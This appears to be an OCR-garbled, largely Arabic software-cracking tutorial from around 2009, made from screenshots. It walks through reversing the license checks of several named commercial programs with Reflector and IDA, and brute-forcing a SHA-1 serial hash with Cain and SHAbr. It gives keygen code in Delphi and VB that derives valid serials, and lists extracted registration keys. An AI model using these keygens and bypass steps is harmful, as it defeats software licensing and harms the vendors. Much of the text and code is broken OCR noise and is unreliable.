num += 1 
Loop 
1 ((4154345245 
ora y aBoxStyle.OkOnly, Nothing) 


yá ol dial Ja ja dagas es fotring) 


Muro d=ó co ve(DA41543452452 ) +¿0ayailira ostra 


ujad aia rba: 


| Hex 41 54 OS 


Ascii A T 4 R E 


) ATARE- (=p Jus vaóne: ón 


AY a Sas ¿ooo laz ( Roben 


A 


Roben «¿Qodós:123456789 ¿YY 3*23Serial Check dedibidd 1500 aitor jóna, 


Ud ya Auto Ca Eb Hrs: 3 Y F10 0 aozua sJJY 


313233343536373839= 123456789 


1504 fo cóaa( jpóó): 


28 23 00 dado lbs 2009 


las lle As at Ives a gz: ATARE ya 9d lacados z 


41543452452D7474 


IL view | Disassembly 
L_0169: ble.s L_013d 


L_0170: OC.s strá 
L_0172: call string [mscorlib]system.string::Concat(string, string) 
L_0177: stloc.s strá 


L_017b: OC.sS str5 
L_017d: Tdc.14.0 
4 le $4 | 


Shell | Auto Calls Modules Quick View 


local_2 (type='System,Int32') value=36 

local_3 (type="N/A") value=<N/A> 

local_4 (type="N/A') value=<N/A > 

local_5 (type='System, String") value 

local_6 (type='System.String') value="313233343536373839" 
local_7 (type="N/A") value=<N/A> 

local_8 (type="N/A") value=<N/A> 


tt= 7474 


. ATARE-tt: 5% Roben 4 ¿2odó ¿od o 


Brute Force Attacks) 5% Advanced od 


ao lr ÍY ¿3 BtAClick (OK): 


S 030 £aállg: 12: SÍ :15 jub JN dá ión ja: 


Public Sub Bt4Click(ByVal sender As Object, ByVal e As EventArgs) 
Tf ((Strings.Len(Me.TN.Text) <> 12) AndAlso (Strings.Len(Me.TS.Text) < 15)) Then 
Interaction.MsgBox(“InCorrect Input... *, MsgBoxStyle. Exclamation, Nothing) 


Elself Not GenR..MX(GenR .GX(Strings.Mid(Me.TS.Text, 1, 7).ToUpper)) Then 


Interaction.MsgBox("InCorrect Serial... *, MsgBoxStyle.Exclamation, Nothing) 


all ly 00 ¿Ja Iboga 2009 


lr leg As iaa Ives a gz: ATARE ya EN ile z 
*, MsgBoxStyle.Exclamation, Nothing) 


Elself Not GenR.MX(GenR.GX(Strings.Mid(Me.TS. Text, 1, 7). ToUpper)) Then 
Interaction.MsgBox("InCorrect Serial... 
tl il: 


29000049 SHA1 : 
Public Shared Function GX(ByVal StrIn As String) As String 
= New SHA 1CryptoServiceProvider 


Dim left As String = 
Try 
Dim algorithm As = 
= .UTF8.GetBytes(StrIn) 
Dim buffer As Byte() = algorithm.ComputeHash(bytes) 


Dim bytes As Byte 


SjaUeas o 229 50) Buffer lat seayalas; eu aj 18d (000 255) 30 para OS 
)004=4 ,078= — “tija 


78 
00 isos Suzy sg ¿bla Buffer q y A aio iva( 


Dim ¡As Integer = 0 
Do While (¡ <= num2) 


n eds 
A 
= Conversions. ToString(Operators.ConcatenateObject(Operators. ConcatenateObject(left, Interaction.IIf(i = 0), ”, D. buffer(i).ToString)) 


i+=1 
Loop 


A ES 


cctor gil ooo 
Y” StrIn As String) As Boolean 


Public Shared Function 
Return (StrIn = Genk. 


End Function 
¿hoya La y 


06 e lgdiecotua(-) 


5 GOSHAL dee ds dba y 
(E J de) 243 EN AU Juve Ja J a) 


$ tudo vals quo 


A TIN 


lr leg As a loss agz: ATARE ya EN ice a 


Lia jasa ga, diga 2900 ua SM) 


Repair 042 188 186 087 233 121 071 098 089 137 097 189 | 095 081 067 144 126 237 155 044 


RESULT 042188186087233121071098089137097189095081067144126237155044 


:SNDRTGU! y9z Hex » Results gón - subas rio HAL sed Gaye zo ¿ol Hex 


= 


o SND Reverser Tool 1.4 (211 J[x]| 
Function: | 
Convert Decimal Number to Hex y] 
Imput: | 
| 


Key: 


Output; 


raro je: 


o 
có ¿dolia gh, 


abcba57e9794762598961bd5f5143907eed9b2c2 150 ¿93 ye ui úl slo 


£ .... abcba2: 50 iabo og: 


¿yal Sia adi ir 
SHA1 


abi 0 U cada lll 2009 Ga) 


lil leg As oda loeó ag: ATARE yá ga edo t 


Eye Aljya s 


J J 


E00) Y Asa) ja ablulya A 7 'Ñ a 


A 


o 4 A RS 
300% ja ayy: dió JO rá Cain 


A ST e 
a joa: du Ja Shabr 


lglalarialy jo) | 
:) Cracker (vada y ósg 99 Cain dsgasó jes - 


2 Decoders Network Sniffer Traceroute | REN ccou [4? wireless 
Y 


ES 
LM 8: NTLM Hashes (0) 


SA nTLMv2 Hashes (0) 

YA nis-Cache Hashes (0) 

¿2, PwL files (0) 

MA] Cisco 1OS-MDS Hashes (0) 
MM] Cisco PIX-MDS Hashes (0) 
CD APOP-MD5 Hashes (0) 
$ CRAM-MDS Hashes (0) 
«bh OSPF-MDS Hashes (0) 
b RIPy2-MD5 Hashes (0) 
hb VRRP-HMAC Hashes (0) 
VINC-3DES (0) 

md MDZ Hashes (0) 

md MD4 Hashes (0) 

md MDS Hashes (0) 

fria! ashes (0) PAR 


SHA SHA-2 Hashes (0) 


28 dy 080 dado lbs 2009 


lr leg As iaa Ives sz: ATARE ya EN ile z 


ca ¡Jamie +): 


n 


abcba57e9794762598961bd5f5143907eed9b2c2 


SHA1 Hash (in HEX) 


¡2aboba57e9794762598961 bd5f5143907eed9b2d 


Cancel 


id ealiállos ye Attack ForceBrute: 


SHA-1 Hash | Password 
XxX 2abcba57e9794762598961bd5F5143907eed9b2c 


Dictionary Attack 


Brute-Force Attack 


Cryptanalysis Attack via RainbowTables 


GR Cas És E 1% 09 oz Js (e Só ALAS : 


) ey áióaja ón qllja at 7 'ñ y: dat? (, Min 
«7 ) ey ¿da ja ¿lat 7 'Ñ y cap Max 
¿més 

Charset 


Pee LA O OA PO e A A PE A 
ire du: 0d ir 39 dl ei de 39 9d ui de zo, 
seo hd pal yy lle a ai - dede ll all o hh 
Custom 


Oo ás eli ¿Ó09 ) ATAREROBENDOTNETEXPERTA( 


28 2/13 080 dado lbs 2009 


lil leg As oda los ag: ATARE yá ga edo t 


¿ej ge is ¿alga ¿od - it 


Brute-Force Attack 


Charset Password length 


le Predefined plo 
| ABCDEFGHIKLMNOPORSTUVWXYZ Max 


Custom Start from 


| i 


Keyspace Current password 
8031810176 


Key Rate Time Left 


ll hashes of type SHA1 loaded... 
Press the Start button to begin brute-force attack 


EN 


E IN 
“il EUA 
cata: 


Keyspace Current password 
oye 8031810176. ulb> ds pull dsldl BYCONGA 
Key Rate Time Left 
09 ll 2980611 Pass/Sec call Cógll  44.4706 minutes 


-£ y ¿Users 19 07 ¿poa plo lin nl ad 09 3 DO) guta 


2 


) at di ió jo dá ja elajés do (ROBENET ) dp - PEL (30 
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lr lle As aa Ives sz: ATARE ya EN ice z 


Brute-force Attack 
Charset 


te Predefined 


Password length 
Min 17 <= 


¡ABCDEFGHIJKLMNOPORSTUYWXYZ ” Max [7 per] 


Custom 


Start from 


Keyspace Current password 
2108872879 


Key Rate Time Left 


IROBENET 


Plaintezt of Zebebas7e9794762599961BASE51439078ed9b2S ¡5 ROBENET. 
Attack stopped! 


1 of 1 hashes cracked 


Ll (si e ; | 


+iy 4 209mmR50%Y 


20? 


E TO IE 


: Start Ese Já Lay 1) Custom Ea? ás ) ATAREROBENDOTNETEXPERTA( 


sx Brute Force Attack ds 
J) ud Ed 9 
¿birób (3 gevo): 
aby ly 0 U cada do ll pal 2009 


A y FE] ¿50ja ) 


J 


Ye yá 


luis leg As at Ives agz: ATARE ya 9 lwclaluedsz 


Brute-Forte Attack 


Charset 


Predefined 


+ Custom Start from 


ATAREROBENDOTNETEXPERTA ROBENET 


Keyspace Current password 
16962811 


Key Rate Time Left 


Plaintext of 2aboba57e9794762598961bd5f£5143907eed9b2c is ROBENET 
Attack stopped! 
1 of 1 hashes cracked 


Enter ¿dl y já a dps ¡jo dai sillas (Shabr Jas es all ¿3 RunMe.Bat 


ca CAWINDOWS!system3. hi al 


¿Documents and SettingsPCxDesktopwshabr>cmd 
icrosoft lindows XP [Version 5.1.2688]1 
<C> Copyright 1985-2881 Microsoft Corp. 


¿NDocuments and SettingsNPCxDesktoprshabr> 
SHAbr, the SHA-1 passuword brute forcer 
y Daniel Niggebrugge : 


isage: shabr SHA1_hash -—-c charset 


SHA1_hash: 48 character hex encoded SHA-1 hash 


[Optional: 1 
B priority below normal (sometimes even faster> 
Q quiet, no stats while running 
(Note: —-B 88 -Q seems slow)> 
threads 
length default 15 
length default 1 


¿Documents and SettingsNPCxDesktopsshabr>,, 


A )4 93 EdJÓ: 292 A) leds AU í y Enter (7 Ay DÍ dé + ó ct 


Shabr 2abcba57e9794762598961bd5f5143907eed9b2c-—c UpperAlpha —t 8-m 7 


ai ls Uca lps 2009 


ll lie is ya y lveS vago: ATARE la ga wluedVz 


¿Documents and SettingsNPCADesktoprshabr>cmd 
icrosoft lindows XP [Version 5.1.26088 1 
<C> Copyright 1985-2861 Microsoft Corp. 


¿Documents and SettingsNPCDesktopishabr>Shabr 2abcha57e9794762598 
B?eed?9b2c —- upperalpha -t£ 8 —m ? 


EN Se aotaó : 


¿Documents and SettingsPCDesktopsshabr>cmd 
icrosoft lindows XP [Version 5.1.2648B1 
<C> Copyright 1985-2801 Microsoft Corp 


¿NDocuments and SettingsNPCDesktopisshabr>Shabr 2abcba5 


B?eed9b2c —e upperalpha —t£ 8 —m 
SHA-1 hash: 2abcha57e9794762598961bd5f£51439B7eed9hb2c 


hreads: 8 
Lower priority: no 
no 
Laa 15 
AS ipperalpha 
ABCDEFGHI JKLMNOPQRSTUJURYZ 


Length 7? -—- 4% in 47.14 s (7.58 Mhashes/s> 


15,10 ¿293( 43119006 482010 del jo ROBENET : FE (6008500 


¿Documents and SettingsNPCDesktopishabr>emd 
icrosoft Windows XP [Version 5.1.26081] 
<C> Copyright 1985-2061 Microsoft Corp. 


¿Documents and SettingsPCNDesktopishabr>Shabr 2abchba57e9"794 
B7?eed9b2c —-e upperalpha -t£ 8 —m ? 
SHA-1 hash: 2abcha57e9794762598961bd5f£51439B7eed9hb2c 
hreads: 8 
Lower priority: no 
i no 
Length: Las 15 
ipperalpha 
ABCDEFGH I JKLMNOPQRSTUVURYZ 


Length Y? -— 61% in 655.62 s (7.49 Mhashes/s> 
>>> Found: ROBENET <<< 


Length Y? -— 61% in 655.72 s (7.49 Mhashes/s> 
¿Documents and SettingsNPCDesktopsshabr> 


Ey 


ad eShabr eS ab ¿o lie Cain (són 157 So há ) 


Eoib ¿Sy Gal 3 Soros", go al ] y ¿gd Ed qa 


A INS 


h 


lr lee As at Ives a gz: ATARE ya 9 Wwe elVrs e 


¿va dior : (ROBENET 


:Bt4Click yrbag oo imag zu 


Elself Not GenR..G3X(Me TN. Text) Then 
Interaction.MsgBox('InCorrect Serial... *, MsgBoxStyle.Exdamation, Nothing) 


e q CE sao ae joa JAJoz! ( 4 q Ú EN) 


Public Shared Function G3X(ByVal StrIn As String) As Boolean 
Dim flag As Boolean 
Dim str3 As String = "596573476F4D616E” 
Dim str4 As String = "50-69-54-69-54-53-55-52-52-53-55-56-55-48-51-52-50-68-53-57-54-53-55-51-52-5. 
Dim expression As String = 
Dim str2 As String = ” 
Dim str5 As String ="———————— on »o 


3 Dim num3 As Integer = Strings.Len(expression)."" 

: Dim As Integer = 1 y 

¿ Do While (¡ <= num3) a 
: EE (ss a Conversion. Heñiblrings.AscíStrings.Mid(expression, ¡, DD) 


. 
* 
. 
. 
. 
pe” 
. 
.. 
.. 


¡+= 1 
¿ Loop NA A y hs 
e Str3 = 596573476FAD616E 


If (str5 = str4) Then ¡A sul JA 
G2X 


Return False 
End If 
Return flag 
End Function 


RN 
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lr lle As at Ives a gz: ATARE ya EN WaiclvedVsz 


a 
Public Shared Function G2X(ByVal StrIn As String) As String 
Dim left As String = ” 
Try 
Dim bytes As Byte() = Encoding.UTF8.GetBytes(StrIn) 
Dim num2 As Integer = (bytes.Lenath - 1) 
Dim ¡As Integer = 0 
Do While (¡ <= num2) 
left = Conversions.ToStringí[Operators.ConcatenateObject(Operators.ConcatenateObject(left, Interaction.IIF((1 =1 
i+=1 
Loop 


dry: dt y 390 fa une alYs) Strá po 


050069054069054053055052052053055056055048051052050068053057054053055051052 055054070052068054049054069 


: SADRT String jeóz  iiiwisias 


Base10 Decode (Dec to String) 
Imput: 


” 


05006905406905405305505205205305505605504805105205006805305705405305505105205505407 
0052068054049054069 


EGE6574457870342D596573476F4D616E2 : 0Ó ganá yada 
Str3=596573476F4D616E : 5% JJ ass ds 9 VJ 


A 30 gaáll ssatállea*: 2£6E6574457870342D 


As ónjÓ ja ASC! : 


Result 


¿aloe : 


abia Uca do ll pal 2009 


lira lle As ad Ives agz: ATARE ya EN cicle a 


.) netExp4-001.....netExp-478. : ui (¿353 3aebÍ Mg -netExpa. : 0 de Ms ¿da 


¿ua ¿yt yal SY :ROBENET. 


usa) ¿0 ias lo; BRAClick : 


E Gal: de gra cai 


Elself Not GenR ings.Mi 3 y) Then 


Interaction.MsgBox("InCorrect Serial... *, MsgBoxStyle.Exclamation, Nothing) 


SU ¿have GAX só 2) AO] juay ¿ola joya jiji a 


(MU 2008 33 gua) 


Public Shared Function G4X(ByVal StrIn As String) As Boolean 
If Not 
Return False 

End If 
Dim num As Integer = 0 


Dim num3 As Integer = (Strinas.Len(StrIn) - 1) 
num =0 
Do While (num <= num3) - 
num2 = (num2 + Strings Conversions. ToString(StrIn.Chars(num)), CompareMethod.Binary)) 
num += 1 
Loop 
If (num2 < 24 
Return False 
End If 
Return True €—— 
End Function 


diri El os 


ánlao/S 100024 0035, 


S)al ens 20394) CEN Strin 5*5 a go Lo Ay dad go 24 


4 40:0,19,7 .) 
ataca estr: IV 


1=5*¿57:0 
4=5*dsz: 1 


11=5* ¿52 :7 
2=5* ¿6 :8 
3=5* ¿gq :9 


00000 
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luis leg As at Ives a gz: ATARE ya EN Waiclvedosz 


(vii ql luasallz 1789) + 
(Misjo sr ¿lola at ali? 1179 


oz nda 


88899179 :óx3230)9, Meu d role Pad, 


E ojo 


1 - $ , 


So US dd dy, eva aya ( coló: ¿ócaja: 8.) 10) 


po) 


dad (71, 


Cu ji ja e nó 
Neiva JS (+) -netExpa. (al da 


¡12 at (ROBENET ) + 


05 Gao ac: 


4 


SJ (TXTSTXTN Je 902 Ó o (BtnGen oscar eses: 


Function RandomX( IntIn: Integer ): String; 


Const 
StrArryl 
StrArry2 
StrArry3 
NE EI 
begin 


stri= *; 


, 


: Array [0.. 
: Array [0.. 
: Array [0.. 
String; 1 


Randomize; 


if InTIn 


= 5 Then 


3]0f' String = ("1",'7","8","9"); 

2]Of String E do 

9]Of String SO TB A EG IA ES US 
Integer; 


begin For I:= 1 To 5 Do 


End 


Else If InTIn 


Begin 
Str := Str 
End; 


+ StrArryl1[Random(4)]; 


Result := Str; 


begin For I:= 1 
Begin 
Str := Str 
End; 


End 
Else If InTIn = 
begin For I:= 1 


End; 


End; 


31 Then 


To 3 Do 


+ StrArry3[Random(9)]; 


Result := Str; 


Begin 
Str := Str 
End; 


32 Then 


To 3 Do 


+ StrArry2[Random(2)]; 


Result := Str; 


procedure TForml.BtnGenClick(Sender: TObject); 


begin 


A INS 


lr lee As az Ives gagz: ATARE ya EN Waiclvedosz 


TXTN.text := '.netExp4-' + RandomX(31); 
TXTS.text := 'ROBENET' + RandomX(5) + RandomX (32); 
end; 


o a Ed 4 nodo 
Ju ¿aia h e d LA O ESTA ( Lu gia cuya ) gun o Ea Eya al 


3 


3 e A 
yA a 200 A ago las. 


¡OO) 


Baja pea: 


a 


e 


os palito 


SILA 


oh gala 3 9 Ja gs ¿asias go ala jue res, 


aio 0 U cada do lll 2009 


lg le As aa loe ago: ATARE ya EN ROTA 


lada Dosis Je ya oz UA 


«Net ROE Exammples 


Reflector O 


Deblector O 


Comm Operator 


Da 


O a 
ANI 


RegisterForm ¿4540 ¿goles ya Je eo glas ¿lleva gia, IU jelago japo), geo 


A INS 


ES 


gos 


CommOpJiódito; y dp sas g JOrós Reflector 
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procedure RegisterForm.x8dd6e981ff70b2c2(xel 


E %g RegisterCheck .—- Ea 
E Ag RegisterForm if (RegisterCheck. IsCorrectRegistrationCode(seff. 
E 4) Base Types begin 
E Qe Ec E RegisterCheck.BuildFullRegistration; 
Da MessageBox.Show(Activated, Thanks”); 
39 .cctor() inherited DialogResult := DialogResult, OK 
9 ctor() 5 
> DisposeíBoolean) : Void 
- a MessageBox.Show(Wrong Keycode! 
¿O x0473 :29F1() : String Pe (Wrong Keycode!”) 
¿o Xx (€ (Object, FormClosedEvent A 
¿e Xx Object, EventArgs) : Void 
¿o x3 ) : Void 
¿e y tring) : Void 
¿o «3dab Occ 50287470) : Void y 
¿e y 9cf087b991cefObject, EventArgs) : Void 
ESE 4sssfb7d5() : Void 
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begin 
if (RegisterCheck,IsCorrectRegistrationCode(self.x44e8da 1a93ff139d.Text)) then 
begin 
RegisterCheck, BuildFullRegistration; 
MessageBox.Show(Activated, Thanks"); 
inherited DialogResult := DialogResult, OK 
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end 
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MessageBox.Show(Wrong Keycode!") 
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function ProductInfo, IsCorrectícode: string): boolean; 
var 
num: Integer; 
begin y 
key := code; 
if (key <> nil) then 
begin 
if («fa99a9bdb9ad3773.xdbf9502bdefdbc35 = nil) then 
begin 
dictionary 1 := Dictionary <string; Integer >.Create($520); 
dictionary 1. Add(ALODH-74NXF-J0219-3AUOQ-90E5S', 0); 
dictionary 1.Add(AOX20Q-YKC3R-NZFOI-1X142-IMJCR', 1); e 
dictionary 1.Add(ARBIY-D31P5-ELOCW-GI2MS-V8Z87Z', 2); Me 


.method MARE hidebysig static bool Iscorrect(string coc 


.maxstack 4 
«locals init ( 
[0] bool flag, 
(1] string str, 
[2] int32 num) 
L_0000: Tdc.14.0 
L_0001: stloc.O 
L_0002: 105ES: 0 


L_0004: s 0 1 y/, 
L_0005: brfalse _025f 


L 000c: ldsfld class Imscorliblsvstem.collections.Get 
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if (RegisterCheck. y a x44e8da 1a93ff139d.Text)) then 
begin 


function RegisterCheck, IsCorrectRegistrationCode(code: string): boolean; 
begin 

Result := Productinfo.IsCorrect(code) 
end; 


function ProductInfo. IsCorrect(code: string): boolean; 
var 
num: Integer; 
begin 
key := code; 
if (key <> nil) then 
begin 
if (xfa99a9bdb9ad3773.xdbf9502bdefi 
begin 
dictionary 1 := Dictionary <string; Inter >.Create($20); 
dictionary 1.Add(ALODH-74NXF-JO 
dictionary 1.Add(AOX2Q-YKC3R-NZFOL-1X142-IMJCR', 1); 
dictionary 1.Add(ARBIY-D31P5-ELOCW-GI2MS-V8Z87', 2); 
dictionary 1.Add(ACKTB-HVRDM-2POQN-RO7YY-O0SW1', 3); 
dictionary 1.Add(A7WNQ-JL5XI-S4T6D-DASAB-YGOW1', 4); 
dictionary 1.Add(AQF5L-K09ZC-P6YV2-6BD6V-REDIG', 5); 
dictionary 1.Add(AC4E5-20HB8-XJZPW-VZJZI-JQGET, 6); 
dictionary 1. Add(AI6LS-OKCND-FR80U-XEJSM-ZNIGO', 7); 
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constructor b. Create; 
begin 
self. a; 
self.k :=k.a; 
if (not k.a(self.k, string.Empty)) then 
self.| := true 
else 
self.| := false; 
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| Offset OpCode Operand 
009 |29 ldsfld System. String System. String: :Empty 
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System.Boolean k::a(System. String, System. String) 
» 011 


012 | Idarg.0 
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014 43 stfld 


brtrue.s 
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Create new... 


Replace all with code... 
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E % Formi 
E 4) Base Types 


E (4 Derived Types 
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¿e chkExsFile_CheckedChangec 

Yoid 

es > Dispose(Boolean) : Void 
¿Y Formi_LoadíObject, EventA 
¿9 InitializeComponent() : Void 
9% IsRegsí) : Boolean 


CreateRea() : 


) AutoPPTGraph 


e % Formi 


EE 4) Base Types 
E (4 Derived Types 
4 ,ctor() 
¿o chkExsFile_CheckedChangedíObject, 
2% CreateReg() : Void 
> Dispose(Boolean) : Void 
¿o Form1i_LoadíObject, Eventárgs) : Yoi 
¿e InitializeComponent() : Void 
2% IsRegs() : Boolean 
¿o label2_Clickí(Object, EventArgs) ; Voic 


t, EventArgs) : * 
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begin 
begin 


key. Setvalue(RegKey' 


procedure Form1.CreateReg; 


Disassembler 


procedure Form1.IÍnRegs_ Click(sender: * 
begin 
key := Registry. CurrentUlser.CreateSut 
if (self. bat ic.Text = Form1.TheRight) tt 
begin » y 
MessageBox.Show(Thank you for rec 
key .SetValue(LicWum', self. bxtLic.Tex 
self. RegPanel. Visible := false; 
self. lbEnterLic. Visible := false; 
self. homePanel. Visible := true; 
self. trial := false 
end 
else 
begin 
MessageBox.Show(The license numb 
self. trial := true 


end 


end; 
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key := Registry.CurrentUser,CreateSubKey(Software WCRouter”); 
if (key .GetValue(RegKey”) = nil) then 


random := Random, Create; 
——>str := string.Concat(New(array[5] of string, ( (random.Next($3e8, $270f).ToString 


tr); 


key SetValue(LicWum', 0); 


Registry. CurrentUser.Flush 
end; 
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ab]Regkey REG_SZ 4812-2871-18963 


AutoPPT Charts 


Please entef your license code or buy 
this program: 
.holomy-tools. com 
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License Code 


function Form1, TheRight: string; 
begin 
key := Registry.CurrentUser.CyeateSubKey(SoftwareMCRouter"); 
separator := New(array[1] offfhar, (('-) )); 
—>strArray := key.GetValue(RegKey”). ToString.Split(separator); 
Result := string.Concat(Convert.ToString((((Convert.Tolnt32(strArray[0]) div $4e) + $25) as Integer), 


end; A A A A 
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O Part1 : (4812 / 78) +37 =61+37=98 

O Part2 : (2871/78) + 37 =73 

O Part3 : (18963 / 78) + 37 = 280 

O Serial = Part 1 8 Part 2 8. Part3 = 9873280 


JTheRi ght vió Sí ¿Qca EULEOY dl as) ¿b y 
ji ju ja dica ada a jalo ja ds 


Function GetSerial ( ID : String ) : String; 

Var Partl,temp, Part2 ,Part3 ,Serial :String; 1,K :Integer; 
Begin 

partl1l:= Copy (1D,1,pos('-',1D)-1); 
Temp:=Copy (ID, pos('-',1D)+1, Length(Id)); 

Part2:= Copy( Temp, 1,pos('-',Temp)-1); 

Part3:= Copy( Temp, pos('-',Temp)+1, length ( Temp )); 
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Part1:= IntToStr(( StrTolInt (Part1) Div 78 ) + 37 ) 
Part2:= IntToStr(( StrTolnt (Part2) Div 78 ) + 37 ) 
Part3:= IntToStr(( StrToInt(Part3) Div 78 ) + 37 ); 


Serial := Partl + Part2 + Part3 ; 
Result:= Serial; 
end; 
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0 RegistrationId 
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¿9readFrom em.ServiceModel, Transactions. WsatRegistrationHe 
Crtimplemeng s>,Lang... idule > 
Button2_Click 


DocTray.Form3 


: syscode3 - ¿Y sayo js Cb ji 


Elself (Me .UNLOCK.Text = Conversions. ToString(MyProject.Forms.KlikSettingsForm.syscode3)) Then 
MyProject.FoMys.KlikSettinasForm.statuscode = 1 
MyProject.For 


KlikSettingsForm.regis = 1 
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Dim num2 As Integer 
Me.regdata = Environment.UserName 
If (Strings.Len(Me.regdata) <= 3) Then 
Me.regdata = Dns.GetHostName 
End If 
Tf (Strinos.Len(Me.regdata) <= 3) Then 
Me.regdata = (Me.regdata € "+" € Environment, UserName) 
End If 
If (Strinos.Len(Me.regdata) <= 3) Then 
Me.regdata = (Me.regdata 8 "+" € Me.regdata) 
End If 
If (Me. syscode3 = 0) Then 
num2 = Strings.Len(Me.regdata) 
Me.syscode3 =0 
Dim nums5 As Integer = num2 
Dim ¡As Integer = 1 
Do While (¡ <= num5) 
Dim num3 As Integer = Strings.Asc(Strings.Mid(Me.regdata, i, 1)) 
Me.syscode3 = (Me.syscode3 + ((8H750 * i) * num3)) 


i+=1 Ñ 
Loop 


End If 
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Me.regdata = Environment .UserName 

ap lu, Iuirdy 255 53 >igó ly 1302 // 
If (Strings.Len(Me.regdata) <= 3) Then 
Iso) jalo ps 5) 

Me.regdata = 

Dns.GetHostName End If 

ase >lolía [id ¡da $ 4 >úgi? // 

If (Strings.Len(Me.regdata) <= 3) Then 

3 Lád lus Iairdy pida lid // 
Me.regdata = (Me.regdata 8 "+" $£ Environment .UserName) 


End If 

2 Tur. Jide ole la lid de $ 4 >úgo? // 

If (Strings.Len(Me.regdata) <= 3) Then 

1) "Só lid 26, // 

Me.regdata = (Me.regdata £ "+" € Me.regdata) 

End If 

If (Me.syscode3 = 0) Then 
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num2 = Strings.Len(Me.regdata) 

Me.syscode3 = 0 

Dim num5 As Integer = num2 
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Do While (i <= num5) 

33 2L ilya Sa > Lista, // 

Dim num3 As Integer = Strings.Asc(Strings.Mid(Me.regdata,i,1)) 
Wo Ilrilo o 1872 3, vin ¡PEJE > ldrñó,. luli 9>¿ da. ldagid a ragl// 
Me.syscode3 = (Me.syscode3 + ((8£H750 * i) * num3)) 
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Loop 
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Dim regdata As string KÉ_, 
Dim syscode3 is Integer 
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regdata = Environment. UserName 
If (Strings.Lení(regdata) <= 3) Then 
regdata = ¡Enviroanent Hechineñana) ¿Tolo 
End If 
If (Strings.Lení(regdata) <= 3) Then 
regdata = (regdata £ "+" £ Environment. UserName) 
End 1£f 
If (Strings.Lení(regdata) <= 3) Then 
regdata = (regdata £ "+" £ regdata) 
End If 
If (syscode3 = 0) Then 
nun = Strings.Leníregdata) 
syscode3 = O 
Dim num5 As Integer = num2 
Dim i is Integer = 1 
Do While (i <= num5) 
Dim num3 4s Integer = Strings.Asc(Strings.Midí(regdata, i, 1)) 
syscode3 = (syscode3 + ((£H?50 * ij) * num3)) 
i+= 1 
Loop 
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allá jalo ¿ya boo Ly hato, 


ENTETEY Gui GA sd ye Go Lo pubs ¿ues CA o Lo podia ¿uas ¿oi Zo PC Pocket . 


301330 
aL], js yd Cita qa ¿yd 


v5.2.0.908 IDA sisard¿d tal ja O 


giasila ¿q ¿3 Ultra RscEditorágzasós O l (55) 
visi q 5 UnMakeSISvO.2LógÓ) O — 


¿bai ip yy a 200 [£2) 


AV os reood e oo: ap aLo): 


YM zos diva jos IDA 9 Y 2 ghd ele q tea ARM 9003 baya jajaa, 


” E a ¿Qu digo ón qual 


boass q casado rado aba 20090 ya > 1200, 


Y co dao DA Ge ps dj 


as oa 


21 da): 33 2 Guayalospro IDA 


— Sc IOS q 


all Bu ls ud de Ado ¡gas (374) 


ly log tas ae lle gc: ATARE bo az luzel wdicrdsz 


¿? 


et 


e IYlá 30/33 241 ¿e readme.txt 


Disassembly | Analysis | sreferences | Strings | Browser Graph | Misc | Disassembly | Analysis | Cross-references | Strings | Browser. Graph | Misc 
“Address representation Display disassembly line parts 
[O Function ofísets Line prefixes 
Include segment addresses Stack pointer 
[M]Use segmentnames [Y] Comments Torget processor MAMA y | 
Repeetable comments 
Display disassembly lines [Y] Auto comments Target assembler [Generic assembler tor ARM w 
Empty lines Bad instruction <BAD> marks 
Borders between dsta/code : | 
O Basic block boundares Number ofopcode bytes ¡Anolysis == e — - 
Source line numbers [MJEnabled Lukesepiegy) halccions 
Instructions indention 0 | [W]indicator enabled - EP 
p : ; — Processor specific analysis options 
Line prefix example: seg000-0FE4 E TT | l J 
Lowsuspiciousness limit pul 0000000 | Right margin ps ] Resnelyze program 
High suspiciousness limi 0x1000082C | Spaces for tabuletion ¡8 


(5) Lima) e) 
IDA Options IDA Options 
| Disassembly | Analysis| Cross-eferel y tings | Browser | Graph [Misc 


"Name generation 
Generate names Prefie: Ja Cross reference parts : y 
Comment ASCI! references a AAN Display vel values Ae 
Mask as autogenerated E 
Display xref type mark Cross reference depth 
Display function ofísets 


Display segments in xrefs 


ASCII nextline char (forces nextline) 10 | O Preserve case 


[] Generate serial names Numberotdisplayedxres O 


Stingtype  N] 


Example: CREF: sometunc+Dx22 


Demanoled C+= names E 


Show demanalad C++ names as: 


(O Comments 
Names 
Dontdemangle 


| 7 Assume GCC v3xnames 


Setup shortnames | 


| Setup long names | 
e 


A INS Grs H— 


las leg as dz Ives oasz: ATARE Di $ Dd ¡de 1 alvedOz 


: lesáls lisos 3 


Ogg? ¿JU oa idO ye ¿e limitations hrs 


y 


A O 


A 
a A AA A CR q, 
FU ptas yo bás Aa) o) Feeds: 


Ringtone Studio 


Register application 
Send software via BT 


OK Back 


esa das y EY LS Ugo ia, 


agobio Jose osapplication Register jue bay y pts 3) ga ELO le esas 


Jl Dope e 


Your IMEI! No. : 
35793-20036-28370 


Enter Unlock Code: 
123 


222222 


OK Cancel 


OU 30 E pa Ol ya als pag 29 ¿ns e ¿iii ¿0 jÉya, 


E NN E TES EE 
e. 4 
: UnMakesSIS 


ab ty YU Ja lll 


loiag lees ame lUESVASZ: ATARE 07 sat lus 7) wild. c 


Installer Versior: 


Calculated Checksum: | 15F307EEh 


Block Dffsets 
Language: | 54h 
PackageLines: ¡66h 


Dependencies: (246h ] 
Certificates: [28h 


Filenames: '694h 


200 


AAA, 


Capabilities: ¡634h 


General Info 
File: ToneStudio_Series50_141.sis 
App Version: — [1.41 build O | SIS File Version: — [6 
VID Info 
AppUID: — [101F7647h | AppUIDZ—— [10000419h | 
App UIDI: 110003412h UID Checksum: — (15F307EEh | 
Install Info 
Install drive: Ñ Language installed: 0 
Space required: [368796 PKG Lines to process: 0 
Space used: ¡10 J PKG Lines processed: [e |] 
Flags: ¡Unicode Number of Languages: 1 
Type: [SISApp App Capabilities: 3] 
Number of Dependencies: 1 
Files 


Signature: ¡299DFh 


lsystemtappsiMidiE di Languages elect. dll 
lsystemtappsiMidiE di MidiE d. aif 
INsystemtappsiMidiE d4MidiE d. App 
INsystemtappsiMidiE diMidiE d.Rsc 


EsystemiappsiMidiEd*MidiEd_CAPTION.RSC 
INsystemtappsMidiE dRingtoneStudioHelp.wmlc 


Lieustarmidar 


AMMAn7a eta 


1 2 


a GN 


A data 


Joscuayllba y pg [DA 0 guau yo 


Ad ¡pat 


colada ¿ea di  sáltapps +00 blilio app. Uy doc als 


SU a pj go do: 


A localizer 


A recogs 


. MidiEd.App ¿231463 “ió y 


a ¿oStringábiya juez: 


loiag lee as ome lUESUASZ: ATARE bos az luzel wc. 


%.." text: 1 000€... 
"..." text:1000C... 
".." text:1 000€... 
